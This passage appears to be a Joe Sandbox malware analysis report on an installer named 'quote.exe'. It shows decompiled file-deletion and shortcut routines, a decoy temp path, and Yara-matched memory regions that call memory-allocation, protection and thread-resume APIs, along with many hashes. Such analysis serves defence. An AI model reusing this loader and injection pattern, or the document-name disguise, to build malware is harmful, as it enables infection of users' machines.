                                                                                      					__eflags =  *_t68;
                                                                                      					if( *_t68 != 0) {
                                                                                      						L10:
                                                                                      						lstrcatW(_t68, 0x40a014);
                                                                                      						L11:
                                                                                      						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                      						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                                                      						_t70 = _t38;
                                                                                      						__eflags = _t70 - 0xffffffff;
                                                                                      						if(_t70 == 0xffffffff) {
                                                                                      							L26:
                                                                                      							__eflags = _a4;
                                                                                      							if(_a4 != 0) {
                                                                                      								_t30 = _t66 - 2;
                                                                                      								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                      								__eflags =  *_t30;
                                                                                      							}
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						do {
                                                                                      							L12:
                                                                                      							__eflags = _v604.cFileName - 0x2e;
                                                                                      							if(_v604.cFileName != 0x2e) {
                                                                                      								L16:
                                                                                      								E00406411(_t66,  &(_v604.cFileName));
                                                                                      								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                      								if(__eflags == 0) {
                                                                                      									_t52 = E00405ADB(__eflags, _t68, _v8);
                                                                                      									__eflags = _t52;
                                                                                      									if(_t52 != 0) {
                                                                                      										E00405479(0xfffffff2, _t68);
                                                                                      									} else {
                                                                                      										__eflags = _v8 - _t52;
                                                                                      										if(_v8 == _t52) {
                                                                                      											 *0x434fa8 =  *0x434fa8 + 1;
                                                                                      										} else {
                                                                                      											E00405479(0xfffffff1, _t68);
                                                                                      											E004061D7(_t67, _t68, 0);
                                                                                      										}
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eflags = (_a8 & 0x00000003) - 3;
                                                                                      									if(__eflags == 0) {
                                                                                      										E00405B23(__eflags, _t68, _a8);
                                                                                      									}
                                                                                      								}
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _v558;
                                                                                      							if(_v558 == 0) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _v558 - 0x2e;
                                                                                      							if(_v558 != 0x2e) {
                                                                                      								goto L16;
                                                                                      							}
                                                                                      							__eflags = _v556;
                                                                                      							if(_v556 == 0) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							goto L16;
                                                                                      							L24:
                                                                                      							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                      							__eflags = _t55;
                                                                                      						} while (_t55 != 0);
                                                                                      						_t38 = FindClose(_t70);
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					__eflags =  *0x42f270 - 0x5c;
                                                                                      					if( *0x42f270 != 0x5c) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					__eflags = _t38;
                                                                                      					if(_t38 == 0) {
                                                                                      						L28:
                                                                                      						__eflags = _a4;
                                                                                      						if(_a4 == 0) {
                                                                                      							L36:
                                                                                      							return _t38;
                                                                                      						}
                                                                                      						__eflags = _v12;
                                                                                      						if(_v12 != 0) {
                                                                                      							_t38 = E0040676F(_t68);
                                                                                      							__eflags = _t38;
                                                                                      							if(_t38 == 0) {
                                                                                      								goto L36;
                                                                                      							}
                                                                                      							E00405CE6(_t68);
                                                                                      							_t38 = E00405ADB(__eflags, _t68, _v8 | 0x00000001);
                                                                                      							__eflags = _t38;
                                                                                      							if(_t38 != 0) {
                                                                                      								return E00405479(0xffffffe5, _t68);
                                                                                      							}
                                                                                      							__eflags = _v8;
                                                                                      							if(_v8 == 0) {
                                                                                      								goto L30;
                                                                                      							}
                                                                                      							E00405479(0xfffffff1, _t68);
                                                                                      							return E004061D7(_t67, _t68, 0);
                                                                                      						}
                                                                                      						L30:
                                                                                      						 *0x434fa8 =  *0x434fa8 + 1;
                                                                                      						return _t38;
                                                                                      					}
                                                                                      					__eflags = _t65 & 0x00000002;
                                                                                      					if((_t65 & 0x00000002) == 0) {
                                                                                      						goto L28;
                                                                                      					}
                                                                                      					goto L5;
                                                                                      				}
                                                                                      			}


















                                                                                      0x00405b2d
                                                                                      0x00405b32
                                                                                      0x00405b3b
                                                                                      0x00405b3e
                                                                                      0x00405b46
                                                                                      0x00405b49
                                                                                      0x00405b4c
                                                                                      0x00405b54
                                                                                      0x00405b56
                                                                                      0x00405b57
                                                                                      0x00000000
                                                                                      0x00405b57
                                                                                      0x00405b62
                                                                                      0x00405b65
                                                                                      0x00405b65
                                                                                      0x00405b65
                                                                                      0x00405b69
                                                                                      0x00405b7c
                                                                                      0x00405b83
                                                                                      0x00405b88
                                                                                      0x00405b8c
                                                                                      0x00405b9c
                                                                                      0x00405b8e
                                                                                      0x00405b94
                                                                                      0x00405b94
                                                                                      0x00405ba1
                                                                                      0x00405ba5
                                                                                      0x00405bb1
                                                                                      0x00405bb7
                                                                                      0x00405bbc
                                                                                      0x00405bc2
                                                                                      0x00405bcd
                                                                                      0x00405bd3
                                                                                      0x00405bd5
                                                                                      0x00405bd8
                                                                                      0x00405c82
                                                                                      0x00405c82
                                                                                      0x00405c86
                                                                                      0x00405c88
                                                                                      0x00405c88
                                                                                      0x00405c88
                                                                                      0x00405c88
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405bde
                                                                                      0x00405bde
                                                                                      0x00405bde
                                                                                      0x00405be6
                                                                                      0x00405c06
                                                                                      0x00405c0e
                                                                                      0x00405c13
                                                                                      0x00405c1a
                                                                                      0x00405c35
                                                                                      0x00405c3a
                                                                                      0x00405c3c
                                                                                      0x00405c60
                                                                                      0x00405c3e
                                                                                      0x00405c3e
                                                                                      0x00405c41
                                                                                      0x00405c55
                                                                                      0x00405c43
                                                                                      0x00405c46
                                                                                      0x00405c4e
                                                                                      0x00405c4e
                                                                                      0x00405c41
                                                                                      0x00405c1c
                                                                                      0x00405c22
                                                                                      0x00405c24
                                                                                      0x00405c2a
                                                                                      0x00405c2a
                                                                                      0x00405c24
                                                                                      0x00000000
                                                                                      0x00405c1a
                                                                                      0x00405be8
                                                                                      0x00405bf0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405bf2
                                                                                      0x00405bfa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405bfc
                                                                                      0x00405c04
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405c65
                                                                                      0x00405c6d
                                                                                      0x00405c73
                                                                                      0x00405c73
                                                                                      0x00405c7c
                                                                                      0x00000000
                                                                                      0x00405c7c
                                                                                      0x00405ba7
                                                                                      0x00405baf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405b6b
                                                                                      0x00405b6b
                                                                                      0x00405b6d
                                                                                      0x00405c8d
                                                                                      0x00405c8f
                                                                                      0x00405c92
                                                                                      0x00405ce3
                                                                                      0x00405ce3
                                                                                      0x00405ce3
                                                                                      0x00405c94
                                                                                      0x00405c97
                                                                                      0x00405ca2
                                                                                      0x00405ca7
                                                                                      0x00405ca9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405cac
                                                                                      0x00405cb8
                                                                                      0x00405cbd
                                                                                      0x00405cbf
                                                                                      0x00000000
                                                                                      0x00405cda
                                                                                      0x00405cc1
                                                                                      0x00405cc4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405cc9
                                                                                      0x00000000
                                                                                      0x00405cd0
                                                                                      0x00405c99
                                                                                      0x00405c99
                                                                                      0x00000000
                                                                                      0x00405c99
                                                                                      0x00405b73
                                                                                      0x00405b76
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405b76

                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,75A33420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B4C
                                                                                      • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405B94
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405BB7
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75A33420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BBD
                                                                                      • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75A33420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BCD
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C6D
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C7C
                                                                                      Strings
                                                                                      • \*.*, xrefs: 00405B8E
                                                                                      • "C:\Users\user\Desktop\quote.exe" , xrefs: 00405B23
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\quote.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                      • API String ID: 2035342205-1907724664
                                                                                      • Opcode ID: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
                                                                                      • Instruction ID: 64ad53015563eb9bad7c636b6f780160dd5a6986b89d0419f795064a900c36f2
                                                                                      • Opcode Fuzzy Hash: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
                                                                                      • Instruction Fuzzy Hash: 8941B330804B18AAEB21AB658D89AAF7778EF41714F24417FF802B11D1D77C5E81DE6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 67%
                                                                                      			E004021A2(void* __eflags) {
                                                                                      				signed int _t52;
                                                                                      				void* _t56;
                                                                                      				intOrPtr* _t60;
                                                                                      				intOrPtr _t61;
                                                                                      				intOrPtr* _t62;
                                                                                      				intOrPtr* _t64;
                                                                                      				intOrPtr* _t66;
                                                                                      				intOrPtr* _t68;
                                                                                      				intOrPtr* _t70;
                                                                                      				intOrPtr* _t72;
                                                                                      				intOrPtr* _t74;
                                                                                      				intOrPtr* _t76;
                                                                                      				intOrPtr* _t78;
                                                                                      				intOrPtr* _t80;
                                                                                      				void* _t83;
                                                                                      				intOrPtr* _t91;
                                                                                      				signed int _t101;
                                                                                      				signed int _t105;
                                                                                      				void* _t107;
                                                                                      
                                                                                      				 *((intOrPtr*)(_t107 - 0x10)) = E00402D3E(0xfffffff0);
                                                                                      				 *((intOrPtr*)(_t107 - 0x44)) = E00402D3E(0xffffffdf);
                                                                                      				 *((intOrPtr*)(_t107 - 8)) = E00402D3E(2);
                                                                                      				 *((intOrPtr*)(_t107 - 0x4c)) = E00402D3E(0xffffffcd);
                                                                                      				 *((intOrPtr*)(_t107 - 0xc)) = E00402D3E(0x45);
                                                                                      				_t52 =  *(_t107 - 0x20);
                                                                                      				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                      				_t101 = _t52 & 0x00008000;
                                                                                      				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                      				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                      				if(E00405D5D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                      					E00402D3E(0x21);
                                                                                      				}
                                                                                      				_t56 = _t107 + 8;
                                                                                      				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56); // executed
                                                                                      				if(_t56 < _t83) {
                                                                                      					L14:
                                                                                      					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                      					_push(0xfffffff0);
                                                                                      				} else {
                                                                                      					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                      					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                                                      					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                      					if(_t61 >= _t83) {
                                                                                      						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                      						if(_t101 == _t83) {
                                                                                      							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption\\Dioxide\\Spokeswoman\\Gelatinous\\Passado195");
                                                                                      						}
                                                                                      						if(_t105 != _t83) {
                                                                                      							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                      						}
                                                                                      						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                      						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                      						if( *_t91 != _t83) {
                                                                                      							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                      						}
                                                                                      						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                      						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                      						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                      							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                      							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                      						}
                                                                                      						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                      						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                      					}
                                                                                      					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                      					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                      					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                      						_push(0xfffffff4);
                                                                                      					} else {
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      				E00401423();
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t107 - 4));
                                                                                      				return 0;
                                                                                      			}






















                                                                                      0x004021ab
                                                                                      0x004021b5
                                                                                      0x004021bf
                                                                                      0x004021c9
                                                                                      0x004021d4
                                                                                      0x004021d7
                                                                                      0x004021f1
                                                                                      0x004021f4
                                                                                      0x004021fa
                                                                                      0x004021fd
                                                                                      0x00402207
                                                                                      0x0040220b
                                                                                      0x0040220b
                                                                                      0x00402210
                                                                                      0x00402221
                                                                                      0x00402229
                                                                                      0x004022e0
                                                                                      0x004022e0
                                                                                      0x004022e7
                                                                                      0x0040222f
                                                                                      0x0040222f
                                                                                      0x0040223e
                                                                                      0x00402242
                                                                                      0x00402245
                                                                                      0x0040224b
                                                                                      0x00402259
                                                                                      0x0040225c
                                                                                      0x0040225e
                                                                                      0x00402269
                                                                                      0x00402269
                                                                                      0x0040226e
                                                                                      0x00402270
                                                                                      0x00402277
                                                                                      0x00402277
                                                                                      0x0040227a
                                                                                      0x00402283
                                                                                      0x00402286
                                                                                      0x0040228c
                                                                                      0x0040228e
                                                                                      0x00402298
                                                                                      0x00402298
                                                                                      0x0040229b
                                                                                      0x004022a4
                                                                                      0x004022a7
                                                                                      0x004022b0
                                                                                      0x004022b6
                                                                                      0x004022b8
                                                                                      0x004022c6
                                                                                      0x004022c6
                                                                                      0x004022c9
                                                                                      0x004022cf
                                                                                      0x004022cf
                                                                                      0x004022d2
                                                                                      0x004022d8
                                                                                      0x004022de
                                                                                      0x004022f3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004022de
                                                                                      0x004022e9
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195, xrefs: 00402261
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195
                                                                                      • API String ID: 542301482-539529829
                                                                                      • Opcode ID: 4373d2ccac3603b03551c12e12cc4eca9aa576ff9ac0ddff88ea01231626ecb5
                                                                                      • Instruction ID: 552a380bc1a798379165a166047c46cc7e7689cdd056a509842d4882e8d45c12
                                                                                      • Opcode Fuzzy Hash: 4373d2ccac3603b03551c12e12cc4eca9aa576ff9ac0ddff88ea01231626ecb5
                                                                                      • Instruction Fuzzy Hash: 33410875A00208AFCF00DFE4C989A9E7BB6FF48314B20457AF515EB2D1DB799981CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040676F(WCHAR* _a4) {
                                                                                      				void* _t2;
                                                                                      
                                                                                      				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                                                      				if(_t2 == 0xffffffff) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				FindClose(_t2);
                                                                                      				return 0x4302b8;
                                                                                      			}




                                                                                      0x0040677a
                                                                                      0x00406783
                                                                                      0x00000000
                                                                                      0x00406790
                                                                                      0x00406786
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(75A33420,004302B8,0042FA70,00405E37,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75A33420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75A33420,C:\Users\user\AppData\Local\Temp\), ref: 0040677A
                                                                                      • FindClose.KERNEL32(00000000), ref: 00406786
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                      • Instruction ID: c6bcef3f8635fd9f58624a192a3d19c105278d067f6c5fe4f3eb3d2c281a06a9
                                                                                      • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                      • Instruction Fuzzy Hash: F0D012315242206FC3805B386E0C84B7A989F16335B218B36B4AAF21E0D7349C3287BC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 'o0$J&=
                                                                                      • API String ID: 0-4155175329
                                                                                      • Opcode ID: a020666f1ce134e05bfb650f3161edd449f8085f195a9afb812b249f072be5d0
                                                                                      • Instruction ID: f2f365fe2c5d82582b7a1ed261a38e193b9fb6398e4c9a050beec117e9ca57a0
                                                                                      • Opcode Fuzzy Hash: a020666f1ce134e05bfb650f3161edd449f8085f195a9afb812b249f072be5d0
                                                                                      • Instruction Fuzzy Hash: 1DD14336608399CFDB349E24CD597EA77E6AFA5350F19852EDC89AB240D7308A41CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(?,281E33A4,-54215759,2F5567A1,55EB8524,-2AE9AA1C), ref: 02C8F9EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 09439a85923859b228006bba2aa2b149da06e17b1b49bb5532fe6c843ab36476
                                                                                      • Instruction ID: e7beea947c5bba06c8875c319aab2a68be1798f0b91a9c8c124863dac2a9ca5c
                                                                                      • Opcode Fuzzy Hash: 09439a85923859b228006bba2aa2b149da06e17b1b49bb5532fe6c843ab36476
                                                                                      • Instruction Fuzzy Hash: 1F617572A04358CFDB309FA5CC997DAB7B2AF85760F06011EDC89AB300C7315A42CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtAllocateVirtualMemory.NTDLL(-25CBAA77,?,-587B45AC), ref: 02C91365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2167126740-0
                                                                                      • Opcode ID: 51da8810059646e8443993c9249435dda065079740108f5c1517a89b6ae991d1
                                                                                      • Instruction ID: ad02eaac36abbce9ded149a95728f9303da047e2ab6cc0c1ca94d806312b8ee8
                                                                                      • Opcode Fuzzy Hash: 51da8810059646e8443993c9249435dda065079740108f5c1517a89b6ae991d1
                                                                                      • Instruction Fuzzy Hash: E5510271608345CFDF64AE24CDD9BDD7BB5EF09354F48052DDC8E9A651E3348A858B02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtResumeThread.NTDLL(00000001,02C941D1,E12E4EF8,00000000,?,?,?,?,02C902F4,02C830BF), ref: 02C93AB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: 8dd8ec6086bd9997f2e2068632f8cfc96f022bf86b30436b7c9d7580b0672916
                                                                                      • Instruction ID: b48d56564ca428e238061f4a13b7d9a4de77bc535dfe1c505022ca862166b3b2
                                                                                      • Opcode Fuzzy Hash: 8dd8ec6086bd9997f2e2068632f8cfc96f022bf86b30436b7c9d7580b0672916
                                                                                      • Instruction Fuzzy Hash: 6701F1316086C5CECF28AE768A9C3E967A2AFC8380F1142A6CC438B644D7308A45CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtProtectVirtualMemory.NTDLL ref: 02C92B29
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MemoryProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2706961497-0
                                                                                      • Opcode ID: 293da5cd2325803e519d4b4ebd56046c58bdb3c98f1053e5ddbec1da0387e236
                                                                                      • Instruction ID: 6109e16787f343f46c613621de032e6b7ad317ed8724874c6eebd3bd4dc48eac
                                                                                      • Opcode Fuzzy Hash: 293da5cd2325803e519d4b4ebd56046c58bdb3c98f1053e5ddbec1da0387e236
                                                                                      • Instruction Fuzzy Hash: DBF03C75A102949FEB34CE24C8146EEB7EAEFD5310F59852EDC859B304CA70AE80CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6fc42679994918ef9cb467f6bc2767c5a1b238eb3793bd3c10025327eb38a27e
                                                                                      • Instruction ID: e005f4250e6415aa26bf47bcb8be76753cf3c3c618eb24d7e04698448d836c8d
                                                                                      • Opcode Fuzzy Hash: 6fc42679994918ef9cb467f6bc2767c5a1b238eb3793bd3c10025327eb38a27e
                                                                                      • Instruction Fuzzy Hash: 6C912D72605388CFDB349F65CCA87EA73A2AF99704F44812ECD8E9B241D335AA41CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d15d9f8b94c718e8b996935edec89f2fa51c127c1f6ce4ab43e358fb3bcaf991
                                                                                      • Instruction ID: 4aeb74309682c153c36f40b6f800007f8c2436ec531229b2338279bec489ccf4
